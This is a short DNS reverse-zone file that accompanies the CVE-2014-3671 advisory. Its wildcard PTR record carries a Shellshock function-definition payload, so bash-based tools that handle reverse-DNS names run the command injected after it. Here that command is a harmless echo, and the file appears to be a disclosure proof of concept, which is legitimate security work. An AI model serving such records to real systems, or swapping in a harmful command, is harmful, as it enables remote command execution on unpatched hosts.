; See the CVE-2014-3671 advisory.
;
; Copyright 2014 Dirk-Willem van Gulik, All Rights Reserved.
;                <dirkx(at)webweaving.org>
; 
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
; 
;     http://www.apache.org/licenses/LICENSE-2.0
; 
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
;
    
$TTL 10;
$ORIGIN in-addr.arpa.

@  IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
    666        ; serial
    360 180 3600 1800 ; Intentioanlly absurdly short livespans.
   )
   IN NS     127.0.0.1
             ; Exploit string; 63 char limit.
*  IN PTR    "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 

